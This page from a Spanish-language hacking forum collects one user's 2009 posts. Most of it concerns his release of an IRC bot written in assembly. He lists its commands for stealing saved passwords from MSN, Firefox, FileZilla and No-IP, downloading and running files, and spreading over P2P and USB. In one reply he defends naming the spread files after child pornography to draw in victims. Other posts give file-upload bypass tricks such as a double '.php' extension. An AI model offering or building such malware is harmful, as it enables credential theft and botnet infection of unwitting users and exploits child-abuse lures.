elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... 68
291  Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b en: 17 Septiembre 2009, 03:24 am
Hola alguien me puede ayudar no se como funciona me pueden explicar o dar un manual-

Tienes que por lo menos saber ensamblar en fasm y tener un poco de idea de programación para poder ocuparlo :P justamente publique el codigo sin ninguna interfas para que no cualquiera lo pudiera usar ;)
292  Seguridad Informática / Nivel Web / Re: [Aplicación] String-Ascii by castg en: 16 Septiembre 2009, 19:46 pm
Yo hice una tool parecida pero que soloi transforma a hexadecimal un string :P dejo el codigo

Código
  1. format pe console
  2. entry start
  3. include 'win32ax.inc'
  4. .code
  5. start:
  6. invoke printf,Logo
  7.  
  8. invoke printf,"Ingrese la string"
  9. invoke printf,n
  10. invoke scanf,"%s",dBuffer
  11. stdcall StringToHex ,dBuffer ,<invoke lstrlen,dBuffer >,dBuffer2
  12. invoke printf,"La string en hexadecimal es:"
  13. invoke printf,n
  14. invoke printf,"0x%s",dBuffer2
  15. invoke system,"pause>>NULL"
  16. invoke ExitProcess,0
  17. ;Descripción: Convierte un dato a hexadecimal
  18. ; by YST
  19. proc StringToHex,cPuntero,cCantidad,cBuffer
  20. pushad
  21. mov esi,[cPuntero]
  22.  
  23. mov edi,[cBuffer]
  24. .bucle:
  25. cmp  [cCantidad],0
  26. je .salir
  27. xor edx,edx
  28. movzx eax,byte[esi]
  29. mov ebx,16
  30. div ebx
  31. mov bl, byte[numeros+eax]
  32. mov byte[edi],bl
  33. mov bl, byte[numeros+edx]
  34. mov byte[edi+1],bl
  35. add edi,2
  36. inc esi
  37. dec  [cCantidad]
  38. jmp  .bucle
  39. .salir:
  40. popad
  41. ret
  42. numeros db '0123456789ABCDEF',0  
  43. endp
  44. .data
  45. Logo db '                      ===================================',13,10          ; LOGO PRINCIPAL
  46.     db '                      =        StringToHex  by YST      =',13,10
  47.     db '                      ===================================',13,10,13,10,13,10,0
  48. dBuffer2 rb MAX_PATH*2
  49. dBuffer  rb MAX_PATH
  50. n db 13,10,0
  51.   section '.idata' import data readable writeable
  52.   library kernel32,'kernel32.dll',msvcrt,'msvcrt.dll'
  53.   include 'api/kernel32.inc'
  54. import msvcrt,printf,"printf",system,"system",scanf,'scanf'
  55.  
  56. section '.reloc' fixups data discardable
293  Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b en: 16 Septiembre 2009, 00:59 am
Una pergunta el comando download, baja elarchivo y lo autoejecuta?

Se ve bueno lo tengo que probar.. yo sigo con los viejos rx xD

oye un consejo, hay una opcion en los rx que es la forma del nick que queres(COUNTRYNICK, OWNERNICK o algo asi xDDD).. que peude ser por pais o por el nombre de la maquina o un nombre aleatorio.. estaria bueno que lo tenga el tuyo tambien :D y lo que no vi fue una pass para los bots.. un login osea te hacen caso solo con el nickmaestro?

solo eso xD

saludos
El comando !DF baja el archivo y lo ejecuta :P

Lo de los se puede cambiar para que sea "El nick que quieras" + Numero X , el comando !CP mediante un PHP te cambia el nick a "Primera 2 letras del pais" + Numero X .

Sobre lo de hacer un login si quieres lo hago pero no lo veo necesario   :rolleyes:
294  Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b en: 15 Septiembre 2009, 19:42 pm
Si por ver el funcionamiento de un bot se debe enaltecer la pornografía infantil yo voto como mínimo que se borre ahora mismo éste tema.

Parece mentira la inmadurez de cierta gente  >:(.
Espero que lo digas en broma :P .

Cada uno le pone los nombres con que quiere que se propague para eso di el source , esos son los nombre que ocupaba yo , lo siento si les duele la realidad pero la pornografia infantil es muy descargada por las redes p2p y en las propagaciones la idea es que infecten ;) .

Saludos
295  Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b en: 15 Septiembre 2009, 01:23 am
Si es de YST [ironia]debe de ser de mala calidad[/ironia]
No! Si es de YST ha de ser humilde!

Hulmilde Software ™ :P
La H es de Humilde  :xD
296  Seguridad Informática / Análisis y Diseño de Malware / [Source] HIRC bot v1.1b en: 14 Septiembre 2009, 20:05 pm
HIRC BOT v1.1 beta


  • ¿Que es ?
    HIRC BOT es un Bot IRC programado en ASM con propagacion USB y P2P(emule y ares )
  • ¿Cuales comandos tiene?
    Código
    1. ;######################################################
    2. ;######################################################
    3. ;#              COMANDOS                              #
    4. ;#!CC <canal> <clave>  = Se conecta a otro canal      #
    5. ;#!RB                  = Reinicia el server           #
    6. ;#!SB                  = Saca el bot                  #
    7. ;#!SC                  = Nos desconectamos del canal. #
    8. ;#!IP                  = Obtiene la IP del BOT        #
    9. ;#!SO                  = Obtiene el sistema operativo #
    10. ;#!PN                  = Obtiene el nombre del PC     #
    11. ;#!UN                  = Obtiene el nombre de usuario #
    12. ;#!HL                  = Obtiene las unidades del PC  #
    13. ;#!IG                  = Obtiene informacion del PC   #
    14. ;#!LE                  = Obtiene el idioma del PC     #
    15. ;#!DF <URL>            = Descarga un archivo.         #
    16. ;#!CM                  = Obtiene claves del MSN       #
    17. ;#!CF  <URL>(opcional) = Claves Firefox               #
    18. ;#!ZF                  = Claves FileZilla             #
    19. ;#!CP <PHP>            = Cambia el nick a el pais     #
    20. ;#!CN                  = Obtiene claves del No-IP.    #
    21. ;#!RA  <File>          = Se propaga por p2p.         #
    22. ;######################################################
    23. ;######################################################  
    24.  

  • ¿Para que son el resto de los archivos?
    Son para el comando "!CC" que utiliza el PHP para detectar el pais de que es el BOT

  • Pequeña explicación sobre cositas del BOT
    El bot crea un proceso del notepad donde inyecta codigo para que si el se cerrara el proceso del BOT se vuelva a abrir.

    El BOT tiene propagacion p2p por Emule y ARES.

    Las claves del Firefox son de la Ultima version el 3.5.x .

    Hay un comando que es el !CD que obtiene las claves del DynDNS que se me olvido ponerlo ;) .
    Descargar
297  Seguridad Informática / Nivel Web / Re: Vulnerabilidad en la subida de imagenes en: 13 Septiembre 2009, 16:48 pm
que quieres decir con eso yst, que hay vulnerabilidad?

o que con ese metodo se podria conseguir en x web?
En el metodo de WHK no hay bug ya que detecta la ultima extención y filtra si no es jpeg,gif,etc.. , pero en muchos uploader's que solo filtran extensiones como el .php y eso si esta ese bug :P
298  Seguridad Informática / Nivel Web / Re: Vulnerabilidad en la subida de imagenes en: 13 Septiembre 2009, 02:02 am
Pero señores, si es .jpg que coño van a ejecutar? :xD

Si no tienes LFI, ni te preocupes, subiran la shell terminada en jpg, y simplemente dara error al mostrarse :D


No creas...
Si pones en la cabecera
GIF89 mas un code malicioso, puedes hacer algo...
Soler, creo que a tu code le hace falta verificar las cabeceras.

Saludos.

SI filtras por extensiones y prohibes las .php, php5, php4 y demas, ya que el servidor se basa en ello para ejecutar codigo php o no, no puedes hacer nada, no?
Prueba poniendo un archivo .php.renombralo :xD Te lo ejecuta igual :P
299  Programación / Programación Visual Basic / Re: [SRC] Deshabilitar TaskMgr *NUEVO METODO* en: 7 Septiembre 2009, 20:06 pm
Muy buen code ;)

Tienes una memoria que la quisiera yo ya ni me acordaba que te habia mencionado la idea de que emdiante Mutex se podia bloquear el taskmngr :D

Saludos
300  Programación / ASM / Re: [Ayuda]MOVSD y MOVSW en: 6 Septiembre 2009, 19:54 pm
CLD

Borra la bandera de dirección ,asignándole un 0 . Las instrucciones de primitivas de cadena incrementan (e)si y (e)di de manera automatica

Formato de instrucción:
CLD
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... 68
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines